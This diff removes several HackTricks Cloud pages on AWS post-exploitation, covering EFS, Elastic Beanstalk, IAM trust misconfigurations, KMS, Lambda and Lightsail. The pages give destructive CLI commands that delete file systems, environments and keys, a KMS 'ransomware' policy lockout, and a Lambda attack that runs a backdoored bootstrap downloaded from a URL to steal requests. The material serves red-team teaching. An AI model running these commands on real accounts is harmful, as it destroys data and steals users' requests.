search for sensitive info in them). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md deleted file mode 100644 index 1a78c9dd2..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md +++ /dev/null @@ -1,80 +0,0 @@ -# AWS - EFS Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EFS - -For more information check: - -{% content-ref url="../aws-services/aws-efs-enum.md" %} -[aws-efs-enum.md](../aws-services/aws-efs-enum.md) -{% endcontent-ref %} - -### `elasticfilesystem:DeleteMountTarget` - -An attacker could delete a mount target, potentially disrupting access to the EFS file system for applications and users relying on that mount target. - -```sql -aws efs delete-mount-target --mount-target-id -``` - -**Potential Impact**: Disruption of file system access and potential data loss for users or applications. - -### `elasticfilesystem:DeleteFileSystem` - -An attacker could delete an entire EFS file system, which could lead to data loss and impact applications relying on the file system. - -```perl -aws efs delete-file-system --file-system-id -``` - -**Potential Impact**: Data loss and service disruption for applications using the deleted file system. - -### `elasticfilesystem:UpdateFileSystem` - -An attacker could update the EFS file system properties, such as throughput mode, to impact its performance or cause resource exhaustion. - -```sql -aws efs update-file-system --file-system-id --provisioned-throughput-in-mibps -``` - -**Potential Impact**: Degradation of file system performance or resource exhaustion. - -### `elasticfilesystem:CreateAccessPoint` and `elasticfilesystem:DeleteAccessPoint` - -An attacker could create or delete access points, altering access control and potentially granting themselves unauthorized access to the file system. - -```arduino -aws efs create-access-point --file-system-id --posix-user --root-directory -aws efs delete-access-point --access-point-id -``` - -**Potential Impact**: Unauthorized access to the file system, data exposure or modification. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md deleted file mode 100644 index 4856870bc..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md +++ /dev/null @@ -1,121 +0,0 @@ -# AWS - Elastic Beanstalk Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Elastic Beanstalk - -For more information: - -{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %} -[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md) -{% endcontent-ref %} - -### `elasticbeanstalk:DeleteApplicationVersion` - -{% hint style="info" %} -TODO: Test if more permissions are required for this -{% endhint %} - -An attacker with the permission `elasticbeanstalk:DeleteApplicationVersion` can **delete an existing application version**. This action could disrupt application deployment pipelines or cause loss of specific application versions if not backed up. - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk delete-application-version --application-name my-app --version-label my-version -``` -{% endcode %} - -**Potential Impact**: Disruption of application deployment and potential loss of application versions. - -### `elasticbeanstalk:TerminateEnvironment` - -{% hint style="info" %} -TODO: Test if more permissions are required for this -{% endhint %} - -An attacker with the permission `elasticbeanstalk:TerminateEnvironment` can **terminate an existing Elastic Beanstalk environment**, causing downtime for the application and potential data loss if the environment is not configured for backups. - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk terminate-environment --environment-name my-existing-env -``` -{% endcode %} - -**Potential Impact**: Downtime of the application, potential data loss, and disruption of services. - -### `elasticbeanstalk:DeleteApplication` - -{% hint style="info" %} -TODO: Test if more permissions are required for this -{% endhint %} - -An attacker with the permission `elasticbeanstalk:DeleteApplication` can **delete an entire Elastic Beanstalk application**, including all its versions and environments. This action could cause a significant loss of application resources and configurations if not backed up. - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk delete-application --application-name my-app --terminate-env-by-force -``` -{% endcode %} - -**Potential Impact**: Loss of application resources, configurations, environments, and application versions, leading to service disruption and potential data loss. - -### `elasticbeanstalk:SwapEnvironmentCNAMEs` - -{% hint style="info" %} -TODO: Test if more permissions are required for this -{% endhint %} - -An attacker with the `elasticbeanstalk:SwapEnvironmentCNAMEs` permission can **swap the CNAME records of two Elastic Beanstalk environments**, which might cause the wrong version of the application to be served to users or lead to unintended behavior. - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk swap-environment-cnames --source-environment-name my-env-1 --destination-environment-name my-env-2 -``` -{% endcode %} - -**Potential Impact**: Serving the wrong version of the application to users or causing unintended behavior in the application due to swapped environments. - -### `elasticbeanstalk:AddTags`, `elasticbeanstalk:RemoveTags` - -{% hint style="info" %} -TODO: Test if more permissions are required for this -{% endhint %} - -An attacker with the `elasticbeanstalk:AddTags` and `elasticbeanstalk:RemoveTags` permissions can **add or remove tags on Elastic Beanstalk resources**. This action could lead to incorrect resource allocation, billing, or resource management. - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk add-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tags Key=MaliciousTag,Value=1 - -aws elasticbeanstalk remove-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tag-keys MaliciousTag -``` -{% endcode %} - -**Potential Impact**: Incorrect resource allocation, billing, or resource management due to added or removed tags. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md deleted file mode 100644 index 7a73ed2bd..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md +++ /dev/null @@ -1,130 +0,0 @@ -# AWS - IAM Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## IAM - -For more information about IAM access: - -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} - -## Confused Deputy Problem - -If you **allow an external account (A)** to access a **role** in your account, you will probably have **0 visibility** on **who can exactly access that external account**. This is a problem, because if another external account (B) can access the external account (A) it's possible that **B will also be able to access your account**. - -Therefore, when allowing an external account to access a role in your account it's possible to specify an `ExternalId`. This is a "secret" string that the external account (A) **need to specify** in order to **assume the role in your organization**. As the **external account B won't know this string**, even if he has access over A he **won't be able to access your role**. - -
- -However, note that this `ExternalId` "secret" is **not a secret**, anyone that can **read the IAM assume role policy will be able to see it**. But as long as the external account A knows it, but the external account **B doesn't know it**, it **prevents B abusing A to access your role**. - -Example: - -```json -{ - "Version": "2012-10-17", - "Statement": { - "Effect": "Allow", - "Principal": { - "AWS": "Example Corp's AWS Account ID" - }, - "Action": "sts:AssumeRole", - "Condition": { - "StringEquals": { - "sts:ExternalId": "12345" - } - } - } -} -``` - -{% hint style="warning" %} -For an attacker to exploit a confused deputy he will need to find somehow if principals of the current account can impersonate roles in other accounts. -{% endhint %} - -### Unexpected Trusts - -#### Wildcard as principal - -```json -{ - "Action": "sts:AssumeRole", - "Effect": "Allow", - "Principal": { "AWS": "*" }, -} -``` - -This policy **allows all AWS** to assume the role. - -#### Service as principal - -```json -{ - "Action": "lambda:InvokeFunction", - "Effect": "Allow", - "Principal": { "Service": "apigateway.amazonaws.com" }, - "Resource": "arn:aws:lambda:000000000000:function:foo" -} -``` - -This policy **allows any account** to configure their apigateway to call this Lambda. - -#### S3 as principal - -```json -"Condition": { -"ArnLike": { "aws:SourceArn": "arn:aws:s3:::source-bucket" }, - "StringEquals": { - "aws:SourceAccount": "123456789012" - } -} -``` - -If an S3 bucket is given as a principal, because S3 buckets do not have an Account ID, if you **deleted your bucket and the attacker created** it in their own account, then they could abuse this. - -#### Not supported - -```json -{ - "Effect": "Allow", - "Principal": {"Service": "cloudtrail.amazonaws.com"}, - "Action": "s3:PutObject", - "Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*" -} -``` - -A common way to avoid Confused Deputy problems is the use of a condition with `AWS:SourceArn` to check the origin ARN. However, **some services might not support that** (like CloudTrail according to some sources). - -## References - -* [https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md deleted file mode 100644 index 18859e4f3..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md +++ /dev/null @@ -1,163 +0,0 @@ -# AWS - KMS Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## KMS - -For more information check: - -{% content-ref url="../aws-services/aws-kms-enum.md" %} -[aws-kms-enum.md](../aws-services/aws-kms-enum.md) -{% endcontent-ref %} - -### Encrypt/Decrypt information - -`fileb://` and `file://` are URI schemes used in AWS CLI commands to specify the path to local files: - -* `fileb://:` Reads the file in binary mode, commonly used for non-text files. -* `file://:` Reads the file in text mode, typically used for plain text files, scripts, or JSON that doesn't have special encoding requirements. - -{% hint style="success" %} -Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64 encoded data. (fileb://) -{% endhint %} - -* Using a **symmetric** key - -```bash -# Encrypt data -aws kms encrypt \ - --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ - --plaintext fileb:///tmp/hello.txt \ - --output text \ - --query CiphertextBlob | base64 \ - --decode > ExampleEncryptedFile - -# Decrypt data -aws kms decrypt \ - --ciphertext-blob fileb://ExampleEncryptedFile \ - --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ - --output text \ - --query Plaintext | base64 \ - --decode -``` - -* Using a **asymmetric** key: - -```bash -# Encrypt data -aws kms encrypt \ - --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ - --encryption-algorithm RSAES_OAEP_SHA_256 \ - --plaintext fileb:///tmp/hello.txt \ - --output text \ - --query CiphertextBlob | base64 \ - --decode > ExampleEncryptedFile - -# Decrypt data -aws kms decrypt \ - --ciphertext-blob fileb://ExampleEncryptedFile \ - --encryption-algorithm RSAES_OAEP_SHA_256 \ - --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ - --output text \ - --query Plaintext | base64 \ - --decode -``` - -### KMS Ransomware - -An attacker with privileged access over KMS could modify the KMS policy of keys and **grant his account access over them**, removing the access granted to the legit account. - -Then, the legit account users won't be able to access any informatcion of any service that has been encrypted with those keys, creating an easy but effective ransomware over the account. - -{% hint style="warning" %} -Note that **AWS managed keys aren't affected** by this attack, only **Customer managed keys**. - -Also note the need to use the param **`--bypass-policy-lockout-safety-check`** (the lack of this option in the web console makes this attack only possible from the CLI). -{% endhint %} - -```bash -# Force policy change -aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \ - --policy-name default \ - --policy file:///tmp/policy.yaml \ - --bypass-policy-lockout-safety-check - -{ - "Id": "key-consolepolicy-3", - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "kms:*", - "Resource": "*" - } - ] -} -``` - -{% hint style="danger" %} -Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**. -{% endhint %} - -
- -### Generic KMS Ransomware - -#### Global KMS Ransomware - -There is another way to perform a global KMS Ransomware, which would involve the following steps: - -* Create a new **key with a key material** imported by the attacker -* **Re-encrypt older data** encrypted with the previous version with the new one. -* **Delete the KMS key** -* Now only the attacker, who has the original key material could be able to decrypt the encrypted data - -### Destroy keys - -```bash -# Destoy they key material previously imported making the key useless -aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab - -# Schedule the destoy of a key (min wait time is 7 days) -aws kms schedule-key-deletion \ - --key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \ - --pending-window-in-days 7 -``` - -{% hint style="danger" %} -Note that AWS now **prevents the previous actions from being performed from a cross account:** -{% endhint %} - -
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md deleted file mode 100644 index f7bea8e86..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md +++ /dev/null @@ -1,55 +0,0 @@ -# AWS - Lambda Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lambda - -For more information check: - -{% content-ref url="../../aws-services/aws-lambda-enum.md" %} -[aws-lambda-enum.md](../../aws-services/aws-lambda-enum.md) -{% endcontent-ref %} - -### Steal Others Lambda URL Requests - -If an attacker somehow manage to get RCE inside a Lambda he will be able to steal other users HTTP requests to the lambda. If the requests contain sensitive information (cookies, credentials...) he will be able to steal them. - -{% content-ref url="aws-warm-lambda-persistence.md" %} -[aws-warm-lambda-persistence.md](aws-warm-lambda-persistence.md) -{% endcontent-ref %} - -### Steal Others Lambda URL Requests & Extensions Requests - -Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. - -{% content-ref url="../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md" %} -[aws-abusing-lambda-extensions.md](../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md deleted file mode 100644 index 94ea21684..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md +++ /dev/null @@ -1,89 +0,0 @@ -# AWS - Steal Lambda Requests - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lambda Flow - -

https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png

- -1. **Slicer** is a process outside the container that **send** **invocations** to the **init** process. -2. The init process listens on port **9001** exposing some interesting endpoints: - * **`/2018-06-01/runtime/invocation/next`** – get the next invocation event - * **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – return the handler response for the invoke - * **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – return an execution error -3. **bootstrap.py** has a loop getting invocations from the init process and calls the users code to handle them (**`/next`**). -4. Finally, **bootstrap.py** sends to init the **response** - -Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process. - -## Stealing Lambda Requests - -The goal of this attack is to make the users code execute a malicious **`bootstrap.py`** process inside the **`bootstrap.py`** process that handle the vulnerable request. This way, the **malicious bootstrap** process will start **talking with the init process** to handle the requests while the **legit** bootstrap is **trapped** running the malicious one, so it won't ask for requests to the init process. - -This is a simple task to achieve as the code of the user is being executed by the legit **`bootstrap.py`** process. So the attacker could: - -* **Send a fake result of the current invocation to the init process**, so init thinks the bootstrap process is waiting for more invocations. - * A request must be sent to **`/${invoke-id}/response`** - * The invoke-id can be obtained from the stack of the legit **`bootstrap.py`** process using the [**inspect**](https://docs.python.org/3/library/inspect.html) python module (as [proposed here](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) or just requesting it again to **`/2018-06-01/runtime/invocation/next`** (as [proposed here](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)). -* Execute a malicious **`boostrap.py`** which will handle the next invocations - * For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual. - * For this attack, it's enough to get the original code of **`bootstrap.py`** from the system or [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code and run it from the current lambda invocation. - -### Attack Steps - -1. Find a **RCE** vulnerability. -2. Generate a **malicious** **bootstrap** (e.g. [https://raw.githubusercontent.com/carlospolop/lambda\_bootstrap\_switcher/main/backdoored\_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)) -3. **Execute** the malicious bootstrap. - -You can easily perform these actions running: - -```bash -python3 <[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md deleted file mode 100644 index db17d6d72..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md +++ /dev/null @@ -1,56 +0,0 @@ -# AWS - Lightsail Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lightsail - -For more information, check: - -{% content-ref url="../aws-services/aws-lightsail-enum.md" %} -[aws-lightsail-enum.md](../aws-services/aws-lightsail-enum.md) -{% endcontent-ref %} - -### Restore old DB snapshots - -If the DB is having snapshots, you might be able to **find sensitive information currently deleted in old snapshots**. **Restore** the snapshot in a **new database** and check it. - -### Restore Instance Snapshots - -Instance snapshots might contain **sensitive information** of already deleted instances or sensitive info that is deleted in the current instance. **Create new instances from the snapshots** and check them.\ -Or **export the snapshot to an AMI in EC2** and follow the steps of a typical EC2 instance. - -### Access Sensitive Information - -Check out the Lightsail privesc options to learn different ways to access potential sensitive information: - -{% content-ref url="../aws-privilege-escalation/aws-lightsail-privesc.md" %} -[aws-lightsail-privesc.md](../aws-privilege-escalation/aws-lightsail-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md deleted file mode 100644 index 9bd9c70bb..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md +++ /dev/null @@ -1,47 +0,0 @@ -# AWS - Organizations Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
